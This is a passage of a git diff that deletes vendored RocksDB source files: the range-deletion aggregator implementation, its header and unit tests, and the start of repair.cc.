-  if (rep_ == nullptr) {
-    return false;
-  }
-  auto& positional_tombstone_map = GetPositionalTombstoneMap(parsed.sequence);
-  const auto& tombstone_map = positional_tombstone_map.raw_map;
-  if (tombstone_map.empty()) {
-    return false;
-  }
-  auto& tombstone_map_iter = positional_tombstone_map.iter;
-  if (tombstone_map_iter == tombstone_map.end() &&
-      (mode == kForwardTraversal || mode == kBackwardTraversal)) {
-    // invalid (e.g., if AddTombstones() changed the deletions), so need to
-    // reseek
-    mode = kBinarySearch;
-  }
-  switch (mode) {
-    case kFullScan:
-      assert(!collapse_deletions_);
-      // The maintained state (PositionalTombstoneMap::iter) isn't useful when
-      // we linear scan from the beginning each time, but we maintain it anyways
-      // for consistency.
-      tombstone_map_iter = tombstone_map.begin();
-      while (tombstone_map_iter != tombstone_map.end()) {
-        const auto& tombstone = tombstone_map_iter->second;
-        if (icmp_.user_comparator()->Compare(parsed.user_key,
-                                             tombstone.start_key_) < 0) {
-          break;
-        }
-        if (parsed.sequence < tombstone.seq_ &&
-            icmp_.user_comparator()->Compare(parsed.user_key,
-                                             tombstone.end_key_) < 0) {
-          return true;
-        }
-        ++tombstone_map_iter;
-      }
-      return false;
-    case kForwardTraversal:
-      assert(collapse_deletions_ && tombstone_map_iter != tombstone_map.end());
-      if (tombstone_map_iter == tombstone_map.begin() &&
-          icmp_.user_comparator()->Compare(parsed.user_key,
-                                           tombstone_map_iter->first) < 0) {
-        // before start of deletion intervals
-        return false;
-      }
-      while (std::next(tombstone_map_iter) != tombstone_map.end() &&
-             icmp_.user_comparator()->Compare(
-                 std::next(tombstone_map_iter)->first, parsed.user_key) <= 0) {
-        ++tombstone_map_iter;
-      }
-      break;
-    case kBackwardTraversal:
-      assert(collapse_deletions_ && tombstone_map_iter != tombstone_map.end());
-      while (tombstone_map_iter != tombstone_map.begin() &&
-             icmp_.user_comparator()->Compare(parsed.user_key,
-                                              tombstone_map_iter->first) < 0) {
-        --tombstone_map_iter;
-      }
-      if (tombstone_map_iter == tombstone_map.begin() &&
-          icmp_.user_comparator()->Compare(parsed.user_key,
-                                           tombstone_map_iter->first) < 0) {
-        // before start of deletion intervals
-        return false;
-      }
-      break;
-    case kBinarySearch:
-      assert(collapse_deletions_);
-      tombstone_map_iter =
-          tombstone_map.upper_bound(parsed.user_key);
-      if (tombstone_map_iter == tombstone_map.begin()) {
-        // before start of deletion intervals
-        return false;
-      }
-      --tombstone_map_iter;
-      break;
-  }
-  assert(mode != kFullScan);
-  assert(tombstone_map_iter != tombstone_map.end() &&
-         icmp_.user_comparator()->Compare(tombstone_map_iter->first,
-                                          parsed.user_key) <= 0);
-  assert(std::next(tombstone_map_iter) == tombstone_map.end() ||
-         icmp_.user_comparator()->Compare(
-             parsed.user_key, std::next(tombstone_map_iter)->first) < 0);
-  return parsed.sequence < tombstone_map_iter->second.seq_;
-}
-
-bool RangeDelAggregator::ShouldAddTombstones(
-    bool bottommost_level /* = false */) {
-  // TODO(andrewkr): can we just open a file and throw it away if it ends up
-  // empty after AddToBuilder()? This function doesn't take into subcompaction
-  // boundaries so isn't completely accurate.
-  if (rep_ == nullptr) {
-    return false;
-  }
-  auto stripe_map_iter = rep_->stripe_map_.begin();
-  assert(stripe_map_iter != rep_->stripe_map_.end());
-  if (bottommost_level) {
-    // For the bottommost level, keys covered by tombstones in the first
-    // (oldest) stripe have been compacted away, so the tombstones are obsolete.
-    ++stripe_map_iter;
-  }
-  while (stripe_map_iter != rep_->stripe_map_.end()) {
-    if (!stripe_map_iter->second.raw_map.empty()) {
-      return true;
-    }
-    ++stripe_map_iter;
-  }
-  return false;
-}
-
-Status RangeDelAggregator::AddTombstones(
-    std::unique_ptr<InternalIterator> input) {
-  if (input == nullptr) {
-    return Status::OK();
-  }
-  input->SeekToFirst();
-  bool first_iter = true;
-  while (input->Valid()) {
-    if (first_iter) {
-      if (rep_ == nullptr) {
-        InitRep({upper_bound_});
-      } else {
-        InvalidateTombstoneMapPositions();
-      }
-      first_iter = false;
-    }
-    ParsedInternalKey parsed_key;
-    if (!ParseInternalKey(input->key(), &parsed_key)) {
-      return Status::Corruption("Unable to parse range tombstone InternalKey");
-    }
-    RangeTombstone tombstone(parsed_key, input->value());
-    AddTombstone(std::move(tombstone));
-    input->Next();
-  }
-  if (!first_iter) {
-    rep_->pinned_iters_mgr_.PinIterator(input.release(), false /* arena */);
-  }
-  return Status::OK();
-}
-
-void RangeDelAggregator::InvalidateTombstoneMapPositions() {
-  if (rep_ == nullptr) {
-    return;
-  }
-  for (auto stripe_map_iter = rep_->stripe_map_.begin();
-       stripe_map_iter != rep_->stripe_map_.end(); ++stripe_map_iter) {
-    stripe_map_iter->second.iter = stripe_map_iter->second.raw_map.end();
-  }
-}
-
-Status RangeDelAggregator::AddTombstone(RangeTombstone tombstone) {
-  auto& positional_tombstone_map = GetPositionalTombstoneMap(tombstone.seq_);
-  auto& tombstone_map = positional_tombstone_map.raw_map;
-  if (collapse_deletions_) {
-    // In collapsed mode, we only fill the seq_ field in the TombstoneMap's
-    // values. The end_key is unneeded because we assume the tombstone extends
-    // until the next tombstone starts. For gaps between real tombstones and
-    // for the last real tombstone, we denote end keys by inserting fake
-    // tombstones with sequence number zero.
-    std::vector<RangeTombstone> new_range_dels{
-        tombstone, RangeTombstone(tombstone.end_key_, Slice(), 0)};
-    auto new_range_dels_iter = new_range_dels.begin();
-    // Position at the first overlapping existing tombstone; if none exists,
-    // insert until we find an existing one overlapping a new point
-    const Slice* tombstone_map_begin = nullptr;
-    if (!tombstone_map.empty()) {
-      tombstone_map_begin = &tombstone_map.begin()->first;
-    }
-    auto last_range_dels_iter = new_range_dels_iter;
-    while (new_range_dels_iter != new_range_dels.end() &&
-           (tombstone_map_begin == nullptr ||
-            icmp_.user_comparator()->Compare(new_range_dels_iter->start_key_,
-                                             *tombstone_map_begin) < 0)) {
-      tombstone_map.emplace(
-          new_range_dels_iter->start_key_,
-          RangeTombstone(Slice(), Slice(), new_range_dels_iter->seq_));
-      last_range_dels_iter = new_range_dels_iter;
-      ++new_range_dels_iter;
-    }
-    if (new_range_dels_iter == new_range_dels.end()) {
-      return Status::OK();
-    }
-    // above loop advances one too far
-    new_range_dels_iter = last_range_dels_iter;
-    auto tombstone_map_iter =
-        tombstone_map.upper_bound(new_range_dels_iter->start_key_);
-    // if nothing overlapped we would've already inserted all the new points
-    // and returned early
-    assert(tombstone_map_iter != tombstone_map.begin());
-    tombstone_map_iter--;
-
-    // untermed_seq is non-kMaxSequenceNumber when we covered an existing point
-    // but haven't seen its corresponding endpoint. It's used for (1) deciding
-    // whether to forcibly insert the new interval's endpoint; and (2) possibly
-    // raising the seqnum for the to-be-inserted element (we insert the max
-    // seqnum between the next new interval and the unterminated interval).
-    SequenceNumber untermed_seq = kMaxSequenceNumber;
-    while (tombstone_map_iter != tombstone_map.end() &&
-           new_range_dels_iter != new_range_dels.end()) {
-      const Slice *tombstone_map_iter_end = nullptr,
-                  *new_range_dels_iter_end = nullptr;
-      if (tombstone_map_iter != tombstone_map.end()) {
-        auto next_tombstone_map_iter = std::next(tombstone_map_iter);
-        if (next_tombstone_map_iter != tombstone_map.end()) {
-          tombstone_map_iter_end = &next_tombstone_map_iter->first;
-        }
-      }
-      if (new_range_dels_iter != new_range_dels.end()) {
-        auto next_new_range_dels_iter = std::next(new_range_dels_iter);
-        if (next_new_range_dels_iter != new_range_dels.end()) {
-          new_range_dels_iter_end = &next_new_range_dels_iter->start_key_;
-        }
-      }
-
-      // our positions in existing/new tombstone collections should always
-      // overlap. The non-overlapping cases are handled above and below this
-      // loop.
-      assert(new_range_dels_iter_end == nullptr ||
-             icmp_.user_comparator()->Compare(tombstone_map_iter->first,
-                                              *new_range_dels_iter_end) < 0);
-      assert(tombstone_map_iter_end == nullptr ||
-             icmp_.user_comparator()->Compare(new_range_dels_iter->start_key_,
-                                              *tombstone_map_iter_end) < 0);
-
-      int new_to_old_start_cmp = icmp_.user_comparator()->Compare(
-          new_range_dels_iter->start_key_, tombstone_map_iter->first);
-      // nullptr end means extends infinitely rightwards, set new_to_old_end_cmp
-      // accordingly so we can use common code paths later.
-      int new_to_old_end_cmp;
-      if (new_range_dels_iter_end == nullptr &&
-          tombstone_map_iter_end == nullptr) {
-        new_to_old_end_cmp = 0;
-      } else if (new_range_dels_iter_end == nullptr) {
-        new_to_old_end_cmp = 1;
-      } else if (tombstone_map_iter_end == nullptr) {
-        new_to_old_end_cmp = -1;
-      } else {
-        new_to_old_end_cmp = icmp_.user_comparator()->Compare(
-            *new_range_dels_iter_end, *tombstone_map_iter_end);
-      }
-
-      if (new_to_old_start_cmp < 0) {
-        // the existing one's left endpoint comes after, so raise/delete it if
-        // it's covered.
-        if (tombstone_map_iter->second.seq_ < new_range_dels_iter->seq_) {
-          untermed_seq = tombstone_map_iter->second.seq_;
-          if (tombstone_map_iter != tombstone_map.begin() &&
-              std::prev(tombstone_map_iter)->second.seq_ ==
-                  new_range_dels_iter->seq_) {
-            tombstone_map_iter = tombstone_map.erase(tombstone_map_iter);
-            --tombstone_map_iter;
-          } else {
-            tombstone_map_iter->second.seq_ = new_range_dels_iter->seq_;
-          }
-        }
-      } else if (new_to_old_start_cmp > 0) {
-        if (untermed_seq != kMaxSequenceNumber ||
-            tombstone_map_iter->second.seq_ < new_range_dels_iter->seq_) {
-          auto seq = tombstone_map_iter->second.seq_;
-          // need to adjust this element if not intended to span beyond the new
-          // element (i.e., was_tombstone_map_iter_raised == true), or if it
-          // can be raised
-          tombstone_map_iter = tombstone_map.emplace(
-              new_range_dels_iter->start_key_,
-              RangeTombstone(
-                  Slice(), Slice(),
-                  std::max(
-                      untermed_seq == kMaxSequenceNumber ? 0 : untermed_seq,
-                      new_range_dels_iter->seq_)));
-          untermed_seq = seq;
-        }
-      } else {
-        // their left endpoints coincide, so raise the existing one if needed
-        if (tombstone_map_iter->second.seq_ < new_range_dels_iter->seq_) {
-          untermed_seq = tombstone_map_iter->second.seq_;
-          tombstone_map_iter->second.seq_ = new_range_dels_iter->seq_;
-        }
-      }
-
-      // advance whichever one ends earlier, or both if their right endpoints
-      // coincide
-      if (new_to_old_end_cmp < 0) {
-        ++new_range_dels_iter;
-      } else if (new_to_old_end_cmp > 0) {
-        ++tombstone_map_iter;
-        untermed_seq = kMaxSequenceNumber;
-      } else {
-        ++new_range_dels_iter;
-        ++tombstone_map_iter;
-        untermed_seq = kMaxSequenceNumber;
-      }
-    }
-    while (new_range_dels_iter != new_range_dels.end()) {
-      tombstone_map.emplace(
-          new_range_dels_iter->start_key_,
-          RangeTombstone(Slice(), Slice(), new_range_dels_iter->seq_));
-      ++new_range_dels_iter;
-    }
-  } else {
-    auto start_key = tombstone.start_key_;
-    tombstone_map.emplace(start_key, std::move(tombstone));
-  }
-  return Status::OK();
-}
-
-RangeDelAggregator::PositionalTombstoneMap&
-RangeDelAggregator::GetPositionalTombstoneMap(SequenceNumber seq) {
-  assert(rep_ != nullptr);
-  // The stripe includes seqnum for the snapshot above and excludes seqnum for
-  // the snapshot below.
-  StripeMap::iterator iter;
-  if (seq > 0) {
-    // upper_bound() checks strict inequality so need to subtract one
-    iter = rep_->stripe_map_.upper_bound(seq - 1);
-  } else {
-    iter = rep_->stripe_map_.begin();
-  }
-  // catch-all stripe justifies this assertion in either of above cases
-  assert(iter != rep_->stripe_map_.end());
-  return iter->second;
-}
-
-// TODO(andrewkr): We should implement an iterator over range tombstones in our
-// map. It'd enable compaction to open tables on-demand, i.e., only once range
-// tombstones are known to be available, without the code duplication we have
-// in ShouldAddTombstones(). It'll also allow us to move the table-modifying
-// code into more coherent places: CompactionJob and BuildTable().
-void RangeDelAggregator::AddToBuilder(
-    TableBuilder* builder, const Slice* lower_bound, const Slice* upper_bound,
-    FileMetaData* meta,
-    CompactionIterationStats* range_del_out_stats /* = nullptr */,
-    bool bottommost_level /* = false */) {
-  if (rep_ == nullptr) {
-    return;
-  }
-  auto stripe_map_iter = rep_->stripe_map_.begin();
-  assert(stripe_map_iter != rep_->stripe_map_.end());
-  if (bottommost_level) {
-    // TODO(andrewkr): these are counted for each compaction output file, so
-    // lots of double-counting.
-    if (!stripe_map_iter->second.raw_map.empty()) {
-      range_del_out_stats->num_range_del_drop_obsolete +=
-          static_cast<int64_t>(stripe_map_iter->second.raw_map.size()) -
-          (collapse_deletions_ ? 1 : 0);
-      range_del_out_stats->num_record_drop_obsolete +=
-          static_cast<int64_t>(stripe_map_iter->second.raw_map.size()) -
-          (collapse_deletions_ ? 1 : 0);
-    }
-    // For the bottommost level, keys covered by tombstones in the first
-    // (oldest) stripe have been compacted away, so the tombstones are obsolete.
-    ++stripe_map_iter;
-  }
-
-  // Note the order in which tombstones are stored is insignificant since we
-  // insert them into a std::map on the read path.
-  while (stripe_map_iter != rep_->stripe_map_.end()) {
-    bool first_added = false;
-    for (auto tombstone_map_iter = stripe_map_iter->second.raw_map.begin();
-         tombstone_map_iter != stripe_map_iter->second.raw_map.end();
-         ++tombstone_map_iter) {
-      RangeTombstone tombstone;
-      if (collapse_deletions_) {
-        auto next_tombstone_map_iter = std::next(tombstone_map_iter);
-        if (next_tombstone_map_iter == stripe_map_iter->second.raw_map.end() ||
-            tombstone_map_iter->second.seq_ == 0) {
-          // it's a sentinel tombstone
-          continue;
-        }
-        tombstone.start_key_ = tombstone_map_iter->first;
-        tombstone.end_key_ = next_tombstone_map_iter->first;
-        tombstone.seq_ = tombstone_map_iter->second.seq_;
-      } else {
-        tombstone = tombstone_map_iter->second;
-      }
-      if (upper_bound != nullptr &&
-          icmp_.user_comparator()->Compare(*upper_bound,
-                                           tombstone.start_key_) <= 0) {
-        // Tombstones starting at upper_bound or later only need to be included
-        // in the next table. Break because subsequent tombstones will start
-        // even later.
-        break;
-      }
-      if (lower_bound != nullptr &&
-          icmp_.user_comparator()->Compare(tombstone.end_key_,
-                                           *lower_bound) <= 0) {
-        // Tombstones ending before or at lower_bound only need to be included
-        // in the prev table. Continue because subsequent tombstones may still
-        // overlap [lower_bound, upper_bound).
-        continue;
-      }
-
-      auto ikey_and_end_key = tombstone.Serialize();
-      builder->Add(ikey_and_end_key.first.Encode(), ikey_and_end_key.second);
-      if (!first_added) {
-        first_added = true;
-        InternalKey smallest_candidate = std::move(ikey_and_end_key.first);
-        if (lower_bound != nullptr &&
-            icmp_.user_comparator()->Compare(smallest_candidate.user_key(),
-                                             *lower_bound) <= 0) {
-          // Pretend the smallest key has the same user key as lower_bound
-          // (the max key in the previous table or subcompaction) in order for
-          // files to appear key-space partitioned.
-          //
-          // Choose lowest seqnum so this file's smallest internal key comes
-          // after the previous file's/subcompaction's largest. The fake seqnum
-          // is OK because the read path's file-picking code only considers user
-          // key.
-          smallest_candidate = InternalKey(*lower_bound, 0, kTypeRangeDeletion);
-        }
-        if (meta->smallest.size() == 0 ||
-            icmp_.Compare(smallest_candidate, meta->smallest) < 0) {
-          meta->smallest = std::move(smallest_candidate);
-        }
-      }
-      InternalKey largest_candidate = tombstone.SerializeEndKey();
-      if (upper_bound != nullptr &&
-          icmp_.user_comparator()->Compare(*upper_bound,
-                                           largest_candidate.user_key()) <= 0) {
-        // Pretend the largest key has the same user key as upper_bound (the
-        // min key in the following table or subcompaction) in order for files
-        // to appear key-space partitioned.
-        //
-        // Choose highest seqnum so this file's largest internal key comes
-        // before the next file's/subcompaction's smallest. The fake seqnum is
-        // OK because the read path's file-picking code only considers the user
-        // key portion.
-        //
-        // Note Seek() also creates InternalKey with (user_key,
-        // kMaxSequenceNumber), but with kTypeDeletion (0x7) instead of
-        // kTypeRangeDeletion (0xF), so the range tombstone comes before the
-        // Seek() key in InternalKey's ordering. So Seek() will look in the
-        // next file for the user key.
-        largest_candidate = InternalKey(*upper_bound, kMaxSequenceNumber,
-                                        kTypeRangeDeletion);
-      }
-      if (meta->largest.size() == 0 ||
-          icmp_.Compare(meta->largest, largest_candidate) < 0) {
-        meta->largest = std::move(largest_candidate);
-      }
-      meta->smallest_seqno = std::min(meta->smallest_seqno, tombstone.seq_);
-      meta->largest_seqno = std::max(meta->largest_seqno, tombstone.seq_);
-    }
-    ++stripe_map_iter;
-  }
-}
-
-bool RangeDelAggregator::IsEmpty() {
-  if (rep_ == nullptr) {
-    return true;
-  }
-  for (auto stripe_map_iter = rep_->stripe_map_.begin();
-       stripe_map_iter != rep_->stripe_map_.end(); ++stripe_map_iter) {
-    if (!stripe_map_iter->second.raw_map.empty()) {
-      return false;
-    }
-  }
-  return true;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/range_del_aggregator.h b/thirdparty/rocksdb/db/range_del_aggregator.h
deleted file mode 100644
index 9d4b8ca..0000000
--- a/thirdparty/rocksdb/db/range_del_aggregator.h
+++ /dev/null
@@ -1,161 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <map>
-#include <string>
-#include <vector>
-
-#include "db/compaction_iteration_stats.h"
-#include "db/dbformat.h"
-#include "db/pinned_iterators_manager.h"
-#include "db/version_edit.h"
-#include "include/rocksdb/comparator.h"
-#include "include/rocksdb/types.h"
-#include "table/internal_iterator.h"
-#include "table/scoped_arena_iterator.h"
-#include "table/table_builder.h"
-#include "util/kv_map.h"
-
-namespace rocksdb {
-
-// A RangeDelAggregator aggregates range deletion tombstones as they are
-// encountered in memtables/SST files. It provides methods that check whether a
-// key is covered by range tombstones or write the relevant tombstones to a new
-// SST file.
-class RangeDelAggregator {
- public:
-  // @param snapshots These are used to organize the tombstones into snapshot
-  //    stripes, which is the seqnum range between consecutive snapshots,
-  //    including the higher snapshot and excluding the lower one. Currently,
-  //    this is used by ShouldDelete() to prevent deletion of keys that are
-  //    covered by range tombstones in other snapshot stripes. This constructor
-  //    is used for writes (flush/compaction). All DB snapshots are provided
-  //    such that no keys are removed that are uncovered according to any DB
-  //    snapshot.
-  // Note this overload does not lazily initialize Rep.
-  RangeDelAggregator(const InternalKeyComparator& icmp,
-                     const std::vector<SequenceNumber>& snapshots,
-                     bool collapse_deletions = true);
-
-  // @param upper_bound Similar to snapshots above, except with a single
-  //    snapshot, which allows us to store the snapshot on the stack and defer
-  //    initialization of heap-allocating members (in Rep) until the first range
-  //    deletion is encountered. This constructor is used in case of reads (get/
-  //    iterator), for which only the user snapshot (upper_bound) is provided
-  //    such that the seqnum space is divided into two stripes. Only the older
-  //    stripe will be used by ShouldDelete().
-  RangeDelAggregator(const InternalKeyComparator& icmp,
-                     SequenceNumber upper_bound,
-                     bool collapse_deletions = false);
-
-  // We maintain position in the tombstone map across calls to ShouldDelete. The
-  // caller may wish to specify a mode to optimize positioning the iterator
-  // during the next call to ShouldDelete. The non-kFullScan modes are only
-  // available when deletion collapsing is enabled.
-  //
-  // For example, if we invoke Next() on an iterator, kForwardTraversal should
-  // be specified to advance one-by-one through deletions until one is found
-  // with its interval containing the key. This will typically be faster than
-  // doing a full binary search (kBinarySearch).
-  enum RangePositioningMode {
-    kFullScan,  // used iff collapse_deletions_ == false
-    kForwardTraversal,
-    kBackwardTraversal,
-    kBinarySearch,
-  };
-
-  // Returns whether the key should be deleted, which is the case when it is
-  // covered by a range tombstone residing in the same snapshot stripe.
-  // @param mode If collapse_deletions_ is true, this dictates how we will find
-  //             the deletion whose interval contains this key. Otherwise, its
-  //             value must be kFullScan indicating linear scan from beginning..
-  bool ShouldDelete(const ParsedInternalKey& parsed,
-                    RangePositioningMode mode = kFullScan);
-  bool ShouldDelete(const Slice& internal_key,
-                    RangePositioningMode mode = kFullScan);
-  bool ShouldAddTombstones(bool bottommost_level = false);
-
-  // Adds tombstones to the tombstone aggregation structure maintained by this
-  // object.
-  // @return non-OK status if any of the tombstone keys are corrupted.
-  Status AddTombstones(std::unique_ptr<InternalIterator> input);
-
-  // Resets iterators maintained across calls to ShouldDelete(). This may be
-  // called when the tombstones change, or the owner may call explicitly, e.g.,
-  // if it's an iterator that just seeked to an arbitrary position. The effect
-  // of invalidation is that the following call to ShouldDelete() will binary
-  // search for its tombstone.
-  void InvalidateTombstoneMapPositions();
-
-  // Writes tombstones covering a range to a table builder.
-  // @param extend_before_min_key If true, the range of tombstones to be added
-  //    to the TableBuilder starts from the beginning of the key-range;
-  //    otherwise, it starts from meta->smallest.
-  // @param lower_bound/upper_bound Any range deletion with [start_key, end_key)
-  //    that overlaps the target range [*lower_bound, *upper_bound) is added to
-  //    the builder. If lower_bound is nullptr, the target range extends
-  //    infinitely to the left. If upper_bound is nullptr, the target range
-  //    extends infinitely to the right. If both are nullptr, the target range
-  //    extends infinitely in both directions, i.e., all range deletions are
-  //    added to the builder.
-  // @param meta The file's metadata. We modify the begin and end keys according
-  //    to the range tombstones added to this file such that the read path does
-  //    not miss range tombstones that cover gaps before/after/between files in
-  //    a level. lower_bound/upper_bound above constrain how far file boundaries
-  //    can be extended.
-  // @param bottommost_level If true, we will filter out any tombstones
-  //    belonging to the oldest snapshot stripe, because all keys potentially
-  //    covered by this tombstone are guaranteed to have been deleted by
-  //    compaction.
-  void AddToBuilder(TableBuilder* builder, const Slice* lower_bound,
-                    const Slice* upper_bound, FileMetaData* meta,
-                    CompactionIterationStats* range_del_out_stats = nullptr,
-                    bool bottommost_level = false);
-  bool IsEmpty();
-
- private:
-  // Maps tombstone user start key -> tombstone object
-  typedef std::multimap<Slice, RangeTombstone, stl_wrappers::LessOfComparator>
-      TombstoneMap;
-  // Also maintains position in TombstoneMap last seen by ShouldDelete(). The
-  // end iterator indicates invalidation (e.g., if AddTombstones() changes the
-  // underlying map). End iterator cannot be invalidated.
-  struct PositionalTombstoneMap {
-    explicit PositionalTombstoneMap(TombstoneMap _raw_map)
-        : raw_map(std::move(_raw_map)), iter(raw_map.end()) {}
-    PositionalTombstoneMap(const PositionalTombstoneMap&) = delete;
-    PositionalTombstoneMap(PositionalTombstoneMap&& other)
-        : raw_map(std::move(other.raw_map)), iter(raw_map.end()) {}
-
-    TombstoneMap raw_map;
-    TombstoneMap::const_iterator iter;
-  };
-
-  // Maps snapshot seqnum -> map of tombstones that fall in that stripe, i.e.,
-  // their seqnums are greater than the next smaller snapshot's seqnum.
-  typedef std::map<SequenceNumber, PositionalTombstoneMap> StripeMap;
-
-  struct Rep {
-    StripeMap stripe_map_;
-    PinnedIteratorsManager pinned_iters_mgr_;
-  };
-  // Initializes rep_ lazily. This aggregator object is constructed for every
-  // read, so expensive members should only be created when necessary, i.e.,
-  // once the first range deletion is encountered.
-  void InitRep(const std::vector<SequenceNumber>& snapshots);
-
-  PositionalTombstoneMap& GetPositionalTombstoneMap(SequenceNumber seq);
-  Status AddTombstone(RangeTombstone tombstone);
-
-  SequenceNumber upper_bound_;
-  std::unique_ptr<Rep> rep_;
-  const InternalKeyComparator& icmp_;
-  // collapse range deletions so they're binary searchable
-  const bool collapse_deletions_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/range_del_aggregator_test.cc b/thirdparty/rocksdb/db/range_del_aggregator_test.cc
deleted file mode 100644
index 39029bd..0000000
--- a/thirdparty/rocksdb/db/range_del_aggregator_test.cc
+++ /dev/null
@@ -1,157 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <algorithm>
-
-#include "db/db_test_util.h"
-#include "db/range_del_aggregator.h"
-#include "rocksdb/comparator.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class RangeDelAggregatorTest : public testing::Test {};
-
-namespace {
-
-struct ExpectedPoint {
-  Slice begin;
-  SequenceNumber seq;
-};
-
-enum Direction {
-  kForward,
-  kReverse,
-};
-
-void VerifyRangeDels(const std::vector<RangeTombstone>& range_dels,
-                     const std::vector<ExpectedPoint>& expected_points) {
-  // Test same result regardless of which order the range deletions are added.
-  for (Direction dir : {kForward, kReverse}) {
-    auto icmp = InternalKeyComparator(BytewiseComparator());
-    RangeDelAggregator range_del_agg(icmp, {} /* snapshots */, true);
-    std::vector<std::string> keys, values;
-    for (const auto& range_del : range_dels) {
-      auto key_and_value = range_del.Serialize();
-      keys.push_back(key_and_value.first.Encode().ToString());
-      values.push_back(key_and_value.second.ToString());
-    }
-    if (dir == kReverse) {
-      std::reverse(keys.begin(), keys.end());
-      std::reverse(values.begin(), values.end());
-    }
-    std::unique_ptr<test::VectorIterator> range_del_iter(
-        new test::VectorIterator(keys, values));
-    range_del_agg.AddTombstones(std::move(range_del_iter));
-
-    for (const auto expected_point : expected_points) {
-      ParsedInternalKey parsed_key;
-      parsed_key.user_key = expected_point.begin;
-      parsed_key.sequence = expected_point.seq;
-      parsed_key.type = kTypeValue;
-      ASSERT_FALSE(range_del_agg.ShouldDelete(
-          parsed_key,
-          RangeDelAggregator::RangePositioningMode::kForwardTraversal));
-      if (parsed_key.sequence > 0) {
-        --parsed_key.sequence;
-        ASSERT_TRUE(range_del_agg.ShouldDelete(
-            parsed_key,
-            RangeDelAggregator::RangePositioningMode::kForwardTraversal));
-      }
-    }
-  }
-}
-
-}  // anonymous namespace
-
-TEST_F(RangeDelAggregatorTest, Empty) { VerifyRangeDels({}, {{"a", 0}}); }
-
-TEST_F(RangeDelAggregatorTest, SameStartAndEnd) {
-  VerifyRangeDels({{"a", "a", 5}}, {{" ", 0}, {"a", 0}, {"b", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, Single) {
-  VerifyRangeDels({{"a", "b", 10}}, {{" ", 0}, {"a", 10}, {"b", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, OverlapAboveLeft) {
-  VerifyRangeDels({{"a", "c", 10}, {"b", "d", 5}},
-                  {{" ", 0}, {"a", 10}, {"c", 5}, {"d", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, OverlapAboveRight) {
-  VerifyRangeDels({{"a", "c", 5}, {"b", "d", 10}},
-                  {{" ", 0}, {"a", 5}, {"b", 10}, {"d", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, OverlapAboveMiddle) {
-  VerifyRangeDels({{"a", "d", 5}, {"b", "c", 10}},
-                  {{" ", 0}, {"a", 5}, {"b", 10}, {"c", 5}, {"d", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, OverlapFully) {
-  VerifyRangeDels({{"a", "d", 10}, {"b", "c", 5}},
-                  {{" ", 0}, {"a", 10}, {"d", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, OverlapPoint) {
-  VerifyRangeDels({{"a", "b", 5}, {"b", "c", 10}},
-                  {{" ", 0}, {"a", 5}, {"b", 10}, {"c", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, SameStartKey) {
-  VerifyRangeDels({{"a", "c", 5}, {"a", "b", 10}},
-                  {{" ", 0}, {"a", 10}, {"b", 5}, {"c", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, SameEndKey) {
-  VerifyRangeDels({{"a", "d", 5}, {"b", "d", 10}},
-                  {{" ", 0}, {"a", 5}, {"b", 10}, {"d", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, GapsBetweenRanges) {
-  VerifyRangeDels(
-      {{"a", "b", 5}, {"c", "d", 10}, {"e", "f", 15}},
-      {{" ", 0}, {"a", 5}, {"b", 0}, {"c", 10}, {"d", 0}, {"e", 15}, {"f", 0}});
-}
-
-// Note the Cover* tests also test cases where tombstones are inserted under a
-// larger one when VerifyRangeDels() runs them in reverse
-TEST_F(RangeDelAggregatorTest, CoverMultipleFromLeft) {
-  VerifyRangeDels(
-      {{"b", "d", 5}, {"c", "f", 10}, {"e", "g", 15}, {"a", "f", 20}},
-      {{" ", 0}, {"a", 20}, {"f", 15}, {"g", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, CoverMultipleFromRight) {
-  VerifyRangeDels(
-      {{"b", "d", 5}, {"c", "f", 10}, {"e", "g", 15}, {"c", "h", 20}},
-      {{" ", 0}, {"b", 5}, {"c", 20}, {"h", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, CoverMultipleFully) {
-  VerifyRangeDels(
-      {{"b", "d", 5}, {"c", "f", 10}, {"e", "g", 15}, {"a", "h", 20}},
-      {{" ", 0}, {"a", 20}, {"h", 0}});
-}
-
-TEST_F(RangeDelAggregatorTest, AlternateMultipleAboveBelow) {
-  VerifyRangeDels(
-      {{"b", "d", 15}, {"c", "f", 10}, {"e", "g", 20}, {"a", "h", 5}},
-      {{" ", 0},
-       {"a", 5},
-       {"b", 15},
-       {"d", 10},
-       {"e", 20},
-       {"g", 5},
-       {"h", 0}});
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/repair.cc b/thirdparty/rocksdb/db/repair.cc
deleted file mode 100644
index 9ed3260..0000000
--- a/thirdparty/rocksdb/db/repair.cc
+++ /dev/null
@@ -1,650 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Repairer does best effort recovery to recover as much data as possible after
-// a disaster without compromising consistency. It does not guarantee bringing
-// the database to a time consistent state.
-//
-// Repair process is broken into 4 phases:
-// (a) Find files
-// (b) Convert logs to tables
-// (c) Extract metadata
